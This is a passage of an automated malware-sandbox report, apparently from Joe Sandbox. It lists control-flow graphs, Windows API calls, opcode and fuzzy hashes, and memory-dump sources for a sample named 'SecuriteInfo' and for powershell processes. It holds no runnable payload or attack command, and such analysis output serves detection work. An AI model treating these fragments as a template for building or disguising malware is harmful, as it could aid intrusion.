10199->10193 10201 bb95cb 10200->10201 10202 bb95d6 KiUserCallbackDispatcher 10201->10202 10203 bb9600 10201->10203 10202->10203 10203->10193 10220 bbc6f8 10204->10220 10228 bbc6f6 10204->10228 10205 bbc6b2 10205->10177 10209 bbc6b2 10208->10209 10210 bbc6f8 2 API calls 10208->10210 10211 bbc6f6 2 API calls 10208->10211 10209->10177 10210->10209 10211->10209 10213 bbd9e2 10212->10213 10243 bbbc94 10213->10243 10216 bbda60 10217 bbbbc4 GetModuleHandleW 10216->10217 10218 bbda89 10216->10218 10217->10218 10219 bbbc94 GetModuleHandleW 10219->10216 10236 bbbbc4 10220->10236 10223 bbc723 10223->10205 10224 bbc71b 10224->10223 10225 bbc920 GetModuleHandleW 10224->10225 10226 bbc94d 10225->10226 10226->10205 10229 bbc70b 10228->10229 10230 bbbbc4 GetModuleHandleW 10228->10230 10231 bbc723 10229->10231 10235 bbc972 GetModuleHandleW 10229->10235 10230->10229 10231->10205 10232 bbc71b 10232->10231 10233 bbc920 GetModuleHandleW 10232->10233 10234 bbc94d 10233->10234 10234->10205 10235->10232 10237 bbc8d8 GetModuleHandleW 10236->10237 10239 bbc70b 10237->10239 10239->10223 10240 bbc972 10239->10240 10241 bbbbc4 GetModuleHandleW 10240->10241 10242 bbc994 10241->10242 10242->10224 10244 bbbc9f 10243->10244 10245 bbda44 10244->10245 10248 bbe030 10244->10248 10258 bbe020 10244->10258 10245->10219 10249 bbe045 10248->10249 10250 bbbbc4 GetModuleHandleW 10249->10250 10251 bbe069 10249->10251 10250->10251 10252 bbbbc4 GetModuleHandleW 10251->10252 10257 bbe225 10251->10257 10253 bbe1ab 10252->10253 10254 bbbbc4 GetModuleHandleW 10253->10254 10253->10257 10255 bbe1f9 10254->10255 10256 bbbbc4 GetModuleHandleW 10255->10256 10255->10257 10256->10257 10257->10245 10259 bbe045 10258->10259 10260 bbbbc4 GetModuleHandleW 10259->10260 10261 bbe069 10259->10261 10260->10261 10262 bbbbc4 GetModuleHandleW 10261->10262 10267 bbe225 10261->10267 10263 bbe1ab 10262->10263 10264 bbbbc4 GetModuleHandleW 10263->10264 10263->10267 10265 bbe1f9 10264->10265 10266 bbbbc4 GetModuleHandleW 10265->10266 10265->10267 10266->10267 10267->10245 10140 bb54f0 DuplicateHandle 10141 bb5586 10140->10141 10268 bbcb60 10269 bbcba8 LoadLibraryExW 10268->10269 10270 bbcba2 10268->10270 10271 bbcbd9 10269->10271 10270->10269

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 119 bbc6f8-bbc70d call bbbbc4 122 bbc70f-bbc71d call bbc972 119->122 123 bbc723-bbc727 119->123 122->123 128 bbc858-bbc918 122->128 124 bbc73b-bbc77c 123->124 125 bbc729-bbc733 123->125 130 bbc789-bbc797 124->130 131 bbc77e-bbc786 124->131 125->124 167 bbc91a-bbc91d 128->167 168 bbc920-bbc94b GetModuleHandleW 128->168 133 bbc7bb-bbc7bd 130->133 134 bbc799-bbc79e 130->134 131->130 137 bbc7c0-bbc7c7 133->137 135 bbc7a9 134->135 136 bbc7a0-bbc7a7 call bbbbd0 134->136 140 bbc7ab-bbc7b9 135->140 136->140 141 bbc7c9-bbc7d1 137->141 142 bbc7d4-bbc7db 137->142 140->137 141->142 144 bbc7e8-bbc7f1 call bb5f18 142->144 145 bbc7dd-bbc7e5 142->145 149 bbc7fe-bbc803 144->149 150 bbc7f3-bbc7fb 144->150 145->144 152 bbc821-bbc825 149->152 153 bbc805-bbc80c 149->153 150->149 173 bbc828 call bbcc60 152->173 174 bbc828 call bbcc50 152->174 153->152 154 bbc80e-bbc81e call bba538 call bbbbe0 153->154 154->152 157 bbc82b-bbc82e 160 bbc851-bbc857 157->160 161 bbc830-bbc84e 157->161 161->160 167->168 169 bbc94d-bbc953 168->169 170 bbc954-bbc968 168->170 169->170 173->157 174->157
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: d35dbda6a694322c1cf7c4899e9e9ed8681f384fde2fb4f3c1547f9858e33e3f
                                    • Instruction ID: e5df17fe267b0be893e65a4710160f40871f9030515fcc37130664dd7a73a489
                                    • Opcode Fuzzy Hash: d35dbda6a694322c1cf7c4899e9e9ed8681f384fde2fb4f3c1547f9858e33e3f
                                    • Instruction Fuzzy Hash: 7C711470A00B058FD724DF6AD455BAABBF5FF88304F00896DD48ADBA50DBB4E9058F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 175 bbe7ad-bbe81e 176 bbe829-bbe830 175->176 177 bbe820-bbe826 175->177 178 bbe83b-bbe873 176->178 179 bbe832-bbe838 176->179 177->176 180 bbe87b-bbe8da CreateWindowExW 178->180 179->178 181 bbe8dc-bbe8e2 180->181 182 bbe8e3-bbe91b 180->182 181->182 186 bbe928 182->186 187 bbe91d-bbe920 182->187 188 bbe929 186->188 187->186 188->188
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BBE8CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: 75faa97d2fba60e6cf19b6e4aead83ade84137ae1999a9fd378524e7850fc5ee
                                    • Instruction ID: 874918e651466494fda3c43b93f5be74b32cc20b29e8dbb82b031febff7ffaf1
                                    • Opcode Fuzzy Hash: 75faa97d2fba60e6cf19b6e4aead83ade84137ae1999a9fd378524e7850fc5ee
                                    • Instruction Fuzzy Hash: AD51A0B1D00349DFDB14CF99D884ADEBBB5FF48314F24812AE819AB260D7B59945CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 189 bbe7b8-bbe81e 190 bbe829-bbe830 189->190 191 bbe820-bbe826 189->191 192 bbe83b-bbe8da CreateWindowExW 190->192 193 bbe832-bbe838 190->193 191->190 195 bbe8dc-bbe8e2 192->195 196 bbe8e3-bbe91b 192->196 193->192 195->196 200 bbe928 196->200 201 bbe91d-bbe920 196->201 202 bbe929 200->202 201->200 202->202
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BBE8CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    • String ID:
                                    • API String ID: 716092398-0
                                    • Opcode ID: cb7735580f2d9909ab5648a1b32759eed01894804e42b32e37600684571bdc96
                                    • Instruction ID: a30d020c8bce5f2902ff2c23c6b24e05314ca8fec4ae00c40c805503079caa17
                                    • Opcode Fuzzy Hash: cb7735580f2d9909ab5648a1b32759eed01894804e42b32e37600684571bdc96
                                    • Instruction Fuzzy Hash: 5D41A0B1D00349DFDB14CF99D884ADEBBB5FF48314F24812AE819AB260D7B4A945CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 203 bb54e8-bb5584 DuplicateHandle 204 bb558d-bb55aa 203->204 205 bb5586-bb558c 203->205 205->204
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BB5577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 84a302ccfa952e5d3651e21059f399ebbad9b278fcce4bf302f604e628a9bc37
                                    • Instruction ID: 75324647cf28de1dc23c34f88fc17e51d9d929ee3adb9801fa83293d270821c0
                                    • Opcode Fuzzy Hash: 84a302ccfa952e5d3651e21059f399ebbad9b278fcce4bf302f604e628a9bc37
                                    • Instruction Fuzzy Hash: F52114B6D00248AFDB10CF99D484BEEBBF4FB58320F14801AE914A7310C379A945CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 208 bb54f0-bb5584 DuplicateHandle 209 bb558d-bb55aa 208->209 210 bb5586-bb558c 208->210 210->209
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BB5577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 11d5d2092bc896fb8d0bf93854483fbd50fbf519d332fa609ff62dc1794bb17e
                                    • Instruction ID: dd151b20aeeaa6d7013c8221998b1bb2d0fd05133ed3ffa60724e66db6e2d45e
                                    • Opcode Fuzzy Hash: 11d5d2092bc896fb8d0bf93854483fbd50fbf519d332fa609ff62dc1794bb17e
                                    • Instruction Fuzzy Hash: 9721C4B5D002489FDB10CF99D484BEEBBF9FB58324F14841AE915A3310D374A954CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 213 bb9579-bb95d4 215 bb9622-bb963b 213->215 216 bb95d6-bb95fe KiUserCallbackDispatcher 213->216 217 bb9600-bb9606 216->217 218 bb9607-bb961b 216->218 217->218 218->215
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00BB95ED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: 1b9a5cc578ae91d27821b85ae07ff817b43668f54c3baf0ab39fe9436a2604f7
                                    • Instruction ID: 1de8bd32c65a67f1c04cb6a649298a744be8863848753c2e069c57d92ff0ea3b
                                    • Opcode Fuzzy Hash: 1b9a5cc578ae91d27821b85ae07ff817b43668f54c3baf0ab39fe9436a2604f7
                                    • Instruction Fuzzy Hash: 3D21B172804798CFDB11CF98D8593EABFF4EB15314F04409DD546A7252C7799A05CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 220 bbcb5a-bbcba0 221 bbcba8-bbcbd7 LoadLibraryExW 220->221 222 bbcba2-bbcba5 220->222 223 bbcbd9-bbcbdf 221->223 224 bbcbe0-bbcbfd 221->224 222->221 223->224
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 00BBCBCA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 25bb6cdc0a8001663ea015fb626e7300206d4505637e2c07691f058f8c502092
                                    • Instruction ID: a872d29b7efd4a88098647301492d8259a657a98f8853f8c3b00ec1421204200
                                    • Opcode Fuzzy Hash: 25bb6cdc0a8001663ea015fb626e7300206d4505637e2c07691f058f8c502092
                                    • Instruction Fuzzy Hash: 581129B6D042498FDB10CF9AD484BDEFBF4EB59350F04842ED415A7600C3B9A945CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 227 bbcb60-bbcba0 228 bbcba8-bbcbd7 LoadLibraryExW 227->228 229 bbcba2-bbcba5 227->229 230 bbcbd9-bbcbdf 228->230 231 bbcbe0-bbcbfd 228->231 229->228 230->231
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 00BBCBCA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 44aab7836fb0664be0b6c3e788b2425a84994f7a80cdac1eda837c5ba854d9f7
                                    • Instruction ID: 81db7112e945393a1d4a622f4e31fce1fb50c42cca977964ae311307cee4830f
                                    • Opcode Fuzzy Hash: 44aab7836fb0664be0b6c3e788b2425a84994f7a80cdac1eda837c5ba854d9f7
                                    • Instruction Fuzzy Hash: 2211F6B6D002499FDB10CF9AD444BDEFBF4EB98314F14841ED415A7600C3B5A945CFA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 234 bbbbc4-bbc918 236 bbc91a-bbc91d 234->236 237 bbc920-bbc94b GetModuleHandleW 234->237 236->237 238 bbc94d-bbc953 237->238 239 bbc954-bbc968 237->239 238->239
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,00BBC70B), ref: 00BBC93E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 2dff15c6a46ef4c1133b4ffa66deb2bec7971f72f19ee21ad75890b52c578370
                                    • Instruction ID: 86104fab3d0c4723b4d128b63931b2d8db5381a680d74e9c153a0ff3675c362e
                                    • Opcode Fuzzy Hash: 2dff15c6a46ef4c1133b4ffa66deb2bec7971f72f19ee21ad75890b52c578370
                                    • Instruction Fuzzy Hash: 5C1102B6D006498FDB10CF9AD448BEEFBF4EB88324F14846AD459A7600C3B4A945CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 241 bb9588-bb95d4 243 bb9622-bb963b 241->243 244 bb95d6-bb95fe KiUserCallbackDispatcher 241->244 245 bb9600-bb9606 244->245 246 bb9607-bb961b 244->246 245->246 246->243
                                    APIs
                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00BB95ED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID: CallbackDispatcherUser
                                    • String ID:
                                    • API String ID: 2492992576-0
                                    • Opcode ID: b10cd4a93b96083cc9ab8c186c789c70b13c08844924216605695038d8ad672e
                                    • Instruction ID: d574ff70008fb9e13af1e45ee7a878f2cc205f65aa14d292205317ba23b71aeb
                                    • Opcode Fuzzy Hash: b10cd4a93b96083cc9ab8c186c789c70b13c08844924216605695038d8ad672e
                                    • Instruction Fuzzy Hash: 5511BF72804798CFDB10CF99D8447EABFF4EB15314F048059D646B3251C7789A04CBA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de85d7ad29772ed182fe96199fc6ad8553d6a37eb79c408451027940884a232f
                                    • Instruction ID: 76dcaa522e7255e468aebe84df7357a6a6d591eaea9234ccf78c532c90bcd00f
                                    • Opcode Fuzzy Hash: de85d7ad29772ed182fe96199fc6ad8553d6a37eb79c408451027940884a232f
                                    • Instruction Fuzzy Hash: 1AA16236E006198FCF15DFA5C8849EDBBF2FF85300B1585AAE905BB225EBB19945CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.580853323.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fcfbf2f3210de41809e25907019e5831bddf4e1934f61e90ef252a55a9152b3f
                                    • Instruction ID: 4c3da01ed674befc38742b8de24e78a484396d4f58ea7a7213122e5a53415df1
                                    • Opcode Fuzzy Hash: fcfbf2f3210de41809e25907019e5831bddf4e1934f61e90ef252a55a9152b3f
                                    • Instruction Fuzzy Hash: 3EC119B1911F46CBD724CF65EC885A97BA1BB84328F514318D3612BAF1DFB4146ACF84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:7.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:29
                                    Total number of Limit Nodes:2
                                    execution_graph 34605 4d41360 34606 4d41372 34605->34606 34609 4d444c0 34606->34609 34607 4d413a1 34610 4d444c5 34609->34610 34611 4d444ff 34610->34611 34614 4d44588 34610->34614 34618 4d44578 34610->34618 34611->34607 34615 4d4459b 34614->34615 34622 4d445f0 34615->34622 34619 4d4459b 34618->34619 34621 4d445f0 GetFileAttributesW 34619->34621 34620 4d445b9 34620->34611 34621->34620 34624 4d44615 34622->34624 34623 4d445b9 34623->34611 34624->34623 34628 4d450e9 34624->34628 34625 4d446da 34625->34623 34627 4d450e9 GetFileAttributesW 34625->34627 34627->34623 34634 4d450e9 GetFileAttributesW 34628->34634 34635 4d45148 34628->34635 34629 4d45112 34630 4d45118 34629->34630 34640 4d43d1c 34629->34640 34630->34625 34634->34629 34636 4d45160 34635->34636 34637 4d45175 34636->34637 34638 4d43d1c GetFileAttributesW 34636->34638 34637->34629 34639 4d451a6 34638->34639 34639->34629 34641 4d45670 GetFileAttributesW 34640->34641 34643 4d451a6 34641->34643 34643->34625

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1148 7ec7b70-7ec7ba8 1150 7ec7bbf-7ec7bf3 1148->1150 1151 7ec7baa-7ec7bbc 1148->1151 1153 7ec7bf5-7ec7c01 1150->1153 1154 7ec7c03-7ec7c0b 1150->1154 1155 7ec7c11-7ec7c29 call 7ec2db0 1153->1155 1154->1155 1159 7ec7c2b-7ec7c42 1155->1159 1160 7ec7c90-7ec7ca2 1155->1160 1159->1160 1165 7ec7c44-7ec7c88 1159->1165 1163 7ec7cfb-7ec7d08 1160->1163 1164 7ec7ca4-7ec7cb6 1160->1164 1169 7ec7d0a-7ec7d21 1163->1169 1170 7ec7d23-7ec7d35 1163->1170 1164->1163 1171 7ec7cb8-7ec7cca 1164->1171 1165->1160 1169->1170 1175 7ec7d38-7ec7d65 1169->1175 1171->1163 1176 7ec7ccc-7ec7cf5 1171->1176 1178 7ec7de2-7ec7e80 1175->1178 1187 7ec7d67-7ec7d79 1175->1187 1176->1163 1176->1178 1201 7ec82b6-7ec82cb 1178->1201 1202 7ec7e86-7ec7e8a 1178->1202 1187->1178 1190 7ec7d7b-7ec7d98 1187->1190 1190->1178 1195 7ec7d9a-7ec7dac 1190->1195 1199 7ec7dcd-7ec7ddf 1195->1199 1200 7ec7dae-7ec7dcb 1195->1200 1200->1178 1200->1199 1208 7ec8948-7ec895d 1201->1208 1209 7ec82d1-7ec82d5 1201->1209 1203 7ec7e8c-7ec7e9c 1202->1203 1204 7ec7ee7-7ec7fa9 1202->1204 1211 7ec9529-7ec953c 1203->1211 1212 7ec7ea2-7ec7ec3 call 7ec640b 1203->1212 1311 7ec7faf-7ec7fb6 1204->1311 1312 7ec8152-7ec8160 1204->1312 1219 7ec8b0c-7ec8b21 1208->1219 1220 7ec8963-7ec89fd 1208->1220 1213 7ec82d7-7ec82e7 1209->1213 1214 7ec8351-7ec85c1 1209->1214 1217 7ec958e-7ec95a2 1211->1217 1221 7ec7ec9-7ec7ee2 1212->1221 1213->1211 1225 7ec82ed-7ec832d 1213->1225 1411 7ec861e-7ec86a9 1214->1411 1412 7ec85c3-7ec8618 1214->1412 1230 7ec95a3 1217->1230 1233 7ec8b3c-7ec8b75 1219->1233 1234 7ec8b23-7ec8b36 1219->1234 1236 7ec8a08-7ec8a0f 1220->1236 1221->1217 1225->1217 1230->1230 1233->1211 1253 7ec8b7b-7ec8b7f 1233->1253 1234->1233 1242 7ec8cc7-7ec8cdc 1234->1242 1239 7ec8a86-7ec8a98 1236->1239 1240 7ec8a11-7ec8a15 1236->1240 1251 7ec8a9a-7ec8aac 1239->1251 1252 7ec8af1-7ec8b07 1239->1252 1244 7ec8a4f-7ec8a59 1240->1244 1245 7ec8a17-7ec8a43 1240->1245 1259 7ec8ce2-7ec8cea 1242->1259 1260 7ec9063-7ec9078 1242->1260 1244->1211 1249 7ec8a5f-7ec8a81 1244->1249 1245->1244 1249->1217 1251->1252 1265 7ec8aae-7ec8ad7 1251->1265 1252->1217 1253->1211 1258 7ec8b85-7ec8bb9 1253->1258 1271 7ec8bbb-7ec8be7 1258->1271 1272 7ec8bf3-7ec8bfd 1258->1272 1273 7ec953e-7ec958c 1259->1273 1274 7ec8cf0-7ec8d56 1259->1274 1275 7ec907e-7ec90b4 1260->1275 1276 7ec94ab-7ec9521 1260->1276 1265->1252 1270 7ec8ad9-7ec8aeb 1265->1270 1270->1211 1270->1252 1271->1272 1277 7ec8c90-7ec8c9a 1272->1277 1278 7ec8c03-7ec8c8b 1272->1278 1273->1217 1326 7ec8d5c-7ec8e21 1274->1326 1327 7ec8e5e-7ec8e62 1274->1327 1297 7ec90b6 1275->1297 1298 7ec90c1-7ec914a 1275->1298 1276->1211 1277->1211 1281 7ec8ca0-7ec8cc2 1277->1281 1278->1217 1281->1217 1297->1298 1381 7ec914c-7ec91c1 1298->1381 1382 7ec91c6-7ec9308 1298->1382 1316 7ec7fb8-7ec7fcf 1311->1316 1317 7ec8002-7ec8014 1311->1317 1320 7ec8169-7ec81a4 1312->1320 1322 7ec7fdb-7ec7fdf 1316->1322 1323 7ec7fd1-7ec7fd9 1316->1323 1333 7ec801e-7ec809d 1317->1333 1357 7ec81a6-7ec81c5 1320->1357 1358 7ec81c7-7ec81d1 1320->1358 1324 7ec7fe5-7ec7fec 1322->1324 1323->1324 1324->1317 1331 7ec7fee-7ec8000 call 7ec2db0 1324->1331 1401 7ec902c-7ec9036 1326->1401 1402 7ec8e27-7ec8e59 1326->1402 1335 7ec8e64-7ec8e8d 1327->1335 1336 7ec8e90-7ec9027 1327->1336 1331->1317 1350 7ec8016-7ec8018 1331->1350 1374 7ec80df-7ec812a 1333->1374 1375 7ec809f-7ec80dd 1333->1375 1335->1336 1336->1401 1350->1333 1362 7ec81e2-7ec82b3 1357->1362 1358->1362 1363 7ec81d3-7ec81d9 1358->1363 1362->1201 1363->1362 1380 7ec8130-7ec8146 1374->1380 1375->1380 1380->1312 1410 7ec93d7-7ec93e1 1381->1410 1382->1410 1401->1211 1404 7ec903c-7ec905e 1401->1404 1402->1217 1404->1217 1416 7ec9404-7ec940e 1410->1416 1417 7ec93e3-7ec9402 1410->1417 1437 7ec876c 1411->1437 1438 7ec86af-7ec8765 1411->1438 1412->1411 1419 7ec941f-7ec9432 1416->1419 1420 7ec9410-7ec9416 1416->1420 1417->1419 1419->1217 1420->1419 1437->1208 1438->1437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: h?Pl
                                    • API String ID: 0-241095290
                                    • Opcode ID: f6c8b0c7c51f1ef55aa57dd70934675a5e9aaaa3f975ece1920a73e420caa275
                                    • Instruction ID: 53bda30d71ea15736dde5eb5e63c953b0a6907d30da18b53554876c18847d63d
                                    • Opcode Fuzzy Hash: f6c8b0c7c51f1ef55aa57dd70934675a5e9aaaa3f975ece1920a73e420caa275
                                    • Instruction Fuzzy Hash: C0E21874A01219CFDB65DF64C948B9DBBB2FF89305F1085A9E809A7350EB35AD85CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a10efab1a9dd28593adbdebbea7b3658f74be7a97a20ed48498cd44caebe20a
                                    • Instruction ID: 2911660d05093b7523f6dfc0d1dc614b044503474dfb9a9b2c06355710442d96
                                    • Opcode Fuzzy Hash: 0a10efab1a9dd28593adbdebbea7b3658f74be7a97a20ed48498cd44caebe20a
                                    • Instruction Fuzzy Hash: C4A2A6B8A01219CFDB64DF69C994B9DBBF2BB49304F1081E9E409A7361DB359E81CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3acd0c558e75fcc5f751bdae2db416987f925dcd01779296854386e6e515bdd8
                                    • Instruction ID: 726961e700d203f96f76ba655b545427ea92e9bd648f7f70b377505f68daa047
                                    • Opcode Fuzzy Hash: 3acd0c558e75fcc5f751bdae2db416987f925dcd01779296854386e6e515bdd8
                                    • Instruction Fuzzy Hash: AA528B74A002199FDB14DF64C954BEEBBB6EF88304F1591A8E909A7350DB74ED82CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 136009e289e42a2f194c7d5c333a7a90dc17167b86214d04cf9a1c37ed9dc906
                                    • Instruction ID: d2529b979ea8b01e6a276d39cbb99d3516cca2ea9b8d522a91daea27348b44ee
                                    • Opcode Fuzzy Hash: 136009e289e42a2f194c7d5c333a7a90dc17167b86214d04cf9a1c37ed9dc906
                                    • Instruction Fuzzy Hash: 51224C74B01205AFDB04DBB5C590AAE77F6AF88308F149468E902DF395EB39ED49CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3dd06f6a1f2e654d3047c77cc1160f8c4132dbbc234b17b16085554518c199e8
                                    • Instruction ID: f294d01787b4abc7c108e539074b091041ac46760471437ef46b4dd8e7aefdd4
                                    • Opcode Fuzzy Hash: 3dd06f6a1f2e654d3047c77cc1160f8c4132dbbc234b17b16085554518c199e8
                                    • Instruction Fuzzy Hash: 4C229A707012059FDB14DF65D894AAE77F2EF88308F198868E5069B7A4DF74EC46CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
